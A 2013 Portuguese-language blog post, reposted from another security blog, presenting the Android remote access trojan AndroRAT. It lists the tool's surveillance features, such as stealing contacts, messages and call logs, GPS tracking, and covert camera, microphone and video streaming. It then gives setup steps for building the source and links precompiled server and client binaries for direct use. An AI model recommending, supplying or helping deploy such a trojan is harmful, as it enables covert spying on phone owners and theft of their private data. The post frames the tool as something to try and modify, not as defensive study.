segunda-feira, 21 de outubro de 2013

Tutorial unknownsec - DESENVOLVENDO MALWARE PARA ANDROID (UPDATE)

DESENVOLVENDO MALWARE PARA ANDROID (UPDATE)
Aéeeeeee galera vai um tuto de um dos melhores blogs sobre sec que leio, o http://unknownsec.wordpress.com.
Espero que gostem.



Em busca de novos conhecimentos sobre AndroidHack eu descobri um projeto de um malware para Android.

O projeto chamado AndroRAT (RAT vem de Remote Administration Tool) desenvolvido por um francês chamado Robin David, o interessante desse projeto é que ele o deixou disponível na internet o código fonte do projeto, assim possibilitando o estudo de todo o malware e dando a iniciativa da criação de novos malware.

Algumas das funcionalidades do AndroRAT

* Pegar informações de Contatos

* Pegar logs de ligações

* Pegar todas as menssagens

* Localização por GPS/REDE

* Monitoração de mensagens enviadas e recebidas ao vivo

* Monitoração de  ligações ao vivo (Ligações feitas, recebidas, perdidas)

* Tirar foto da camera

* Stream de som do microfone (ou ligações em tempo real)

* Streaming de vídeo

* Mandar mensagem na tela do celular

* Realizar ligações

Bom agora vou mostrar nesse artigo como usar o AndroRAT e como abrir o código fonte dele, que eu particularmente apanhei um pouco rsrsrs.

Primeiro, precisamos preparar nosso computador para isso, faça o download do SDK para android.

http://developer.android.com/sdk/index.html

Assim que terminar, faça a instalação do SDK, abra o eclipse que vem na instalação.

Agora, faça o download do código fonte do Androrat.

https://github.com/RobinDavid/androrat/archive/master.zip

Descompacte o arquivo em uma pasta. Agora, no eclipse, clique em File, New, “projeto”, agora em “android” pasta, selecione a importação de arquivo existente, clique em Avançar, procure a pasta AndroRat (androrat-master\src\AndroRat\ no meu caso claro =D)

Importe ela para o eclipse e seja feliz em modificar seu app.

Eu não vou mostrar como modificar nem como gerar, isso vai do interesse de cada um em aprender.

FAZENDO TESTE VOCÊ MESMO!
Vou disponibilizar já compilado o servidor (desktop) e o client (android)

AndroRat.jar (2.6 MB)

https://mega.co.nz/#!g5tUxbRC!ax5LajVZz1kbyJKg2–3fzu0Z_VkE_BiMEZGb4i8vrg

Androrat.apk (66 KB)

https://mega.co.nz/#!cpFznTCQ!Sd8hthyEwAFdSjN0l7v0ew3frEEUWjhwYfXr19N0zF8
No Client ele pedirá para você colocar o IP e a Porta do Server que aceitará as conexões.


De resto, é só alegria, basta ver o vídeo abaixo para ter uma “noção” de como ele funciona.




(UPDATE) Depois de uma briga com o Megaupload, eu upei os arquivos no 4shared, segue os links.

(UPDATE) After a fight with Megaupload, I upei files at 4shared follows links.

AndroRAT.jar

AndroidClient.apk


Fonte:http://unknownsec.wordpress.com/2013/06/11/desenvolvendo-malware-para-android/

Um comentário:

............